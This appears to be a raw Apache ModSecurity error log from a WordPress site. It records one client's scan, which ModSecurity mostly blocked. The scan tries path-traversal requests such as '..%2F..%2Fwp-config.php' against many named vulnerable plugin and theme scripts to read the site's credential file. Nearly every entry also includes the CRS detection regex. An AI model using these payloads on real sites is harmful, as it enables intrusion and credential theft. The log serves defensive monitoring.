"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-forum/mybb/memberlist.php"] [unique_id "YtscaHhurfgLch3PImzIAgAAAMQ"] [Fri Jul 22 16:53:44.371079 2022] [:error] [pid 22471:tid 140017108236032] [client 72.11.157.116:51532] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"] [unique_id "YtscaOCtYZwatdwcM8Wq0wAAAEQ"] [Fri Jul 22 16:53:44.526396 2022] [:error] [pid 22471:tid 140017074665216] [client 72.11.157.116:51534] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jul 22 16:53:44.526568 2022] [:error] [pid 22471:tid 140017074665216] [client 72.11.157.116:51534] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jul 22 16:53:44.526689 2022] [:error] [pid 22471:tid 140017074665216] [client 72.11.157.116:51534] PHP Warning: require(ABSPATHWPINC/option.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jul 22 16:53:44.526815 2022] [:error] [pid 22471:tid 140017074665216] [client 72.11.157.116:51534] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/option.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/functions.php on line 8 [Fri Jul 22 16:53:44.616573 2022] [:error] [pid 23081:tid 140017116628736] [client 72.11.157.116:51536] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=..%2F..%2F..%2F&filename=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/multi-plugin-installer/mpi_download.php"] [unique_id "YtscaHhurfgLch3PImzIAwAAAMM"] [Fri Jul 22 16:53:44.707731 2022] [:error] [pid 23081:tid 140016973952768] [client 72.11.157.116:51538] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "YtscaHhurfgLch3PImzIBAAAANQ"] [Fri Jul 22 16:53:44.797318 2022] [:error] [pid 22470:tid 140016973952768] [client 72.11.157.116:51540] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php?fileaway=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/file-away/lib/cls/class.fileaway_downloader.php"] [unique_id "YtscaHxqqtgWgIAXsGFhfQAAABQ"] [Fri Jul 22 16:53:45.486453 2022] [:error] [pid 22470:tid 140016999130880] [client 72.11.157.116:51544] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "YtscaXxqqtgWgIAXsGFhfwAAABE"] [Fri Jul 22 16:53:45.575914 2022] [:error] [pid 22472:tid 140016973952768] [client 72.11.157.116:51546] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-manager/views/file_download.php?fname=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-manager/views/file_download.php"] [unique_id "YtscaSpbG8_UBGXeM63wxwAAAJQ"] [Fri Jul 22 16:53:45.665474 2022] [:error] [pid 23081:tid 140016957167360] [client 72.11.157.116:51548] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "YtscaXhurfgLch3PImzIBQAAANY"] [Fri Jul 22 16:53:45.754957 2022] [:error] [pid 22471:tid 140017083057920] [client 72.11.157.116:51550] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php"] [unique_id "YtscaeCtYZwatdwcM8Wq1QAAAEc"] [Fri Jul 22 16:53:45.845595 2022] [:error] [pid 22471:tid 140017057879808] [client 72.11.157.116:51552] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "YtscaeCtYZwatdwcM8Wq1gAAAEo"] [Fri Jul 22 16:53:46.569684 2022] [:error] [pid 22470:tid 140017133414144] [client 72.11.157.116:51556] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "YtscanxqqtgWgIAXsGFhgAAAAAE"] [Fri Jul 22 16:53:46.671408 2022] [:error] [pid 22472:tid 140016948774656] [client 72.11.157.116:51558] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "YtscaipbG8_UBGXeM63wyQAAAJc"] [Fri Jul 22 16:53:46.760823 2022] [:error] [pid 23081:tid 140017099843328] [client 72.11.157.116:51560] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "YtscanhurfgLch3PImzIBgAAAMU"] [Fri Jul 22 16:53:46.850532 2022] [:error] [pid 23081:tid 140016990738176] [client 72.11.157.116:51562] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "YtscanhurfgLch3PImzIBwAAANI"] [Fri Jul 22 16:53:46.940078 2022] [:error] [pid 23081:tid 140016965560064] [client 72.11.157.116:51564] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "YtscanhurfgLch3PImzICAAAANU"] [Fri Jul 22 16:53:47.036672 2022] [:error] [pid 23081:tid 140017091450624] [client 72.11.157.116:51566] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=..%2F..%2F..%2Fwp-config.php&info=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cip4-folder-download-widget/cip4-download.php"] [unique_id "Ytsca3hurfgLch3PImzICQAAAMY"] [Fri Jul 22 16:53:47.733841 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:51572] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/duena/download.php"] [unique_id "YtscaypbG8_UBGXeM63wywAAAJU"] [Fri Jul 22 16:53:47.833367 2022] [:error] [pid 23081:tid 140017141806848] [client 72.11.157.116:51574] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/endlesshorizon/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/endlesshorizon/download.php"] [unique_id "Ytsca3hurfgLch3PImzICwAAAMA"] [Fri Jul 22 16:53:47.922725 2022] [:error] [pid 23081:tid 140017133414144] [client 72.11.157.116:51576] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "Ytsca3hurfgLch3PImzIDAAAAME"] [Fri Jul 22 16:53:48.012064 2022] [:error] [pid 23081:tid 140017015916288] [client 72.11.157.116:51578] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "YtscbHhurfgLch3PImzIDQAAAM8"] [Fri Jul 22 16:53:48.101174 2022] [:error] [pid 22471:tid 140017024308992] [client 72.11.157.116:51580] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "YtscbOCtYZwatdwcM8Wq1wAAAE4"] [Fri Jul 22 16:53:48.192412 2022] [:error] [pid 22472:tid 140017007523584] [client 72.11.157.116:51582] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev 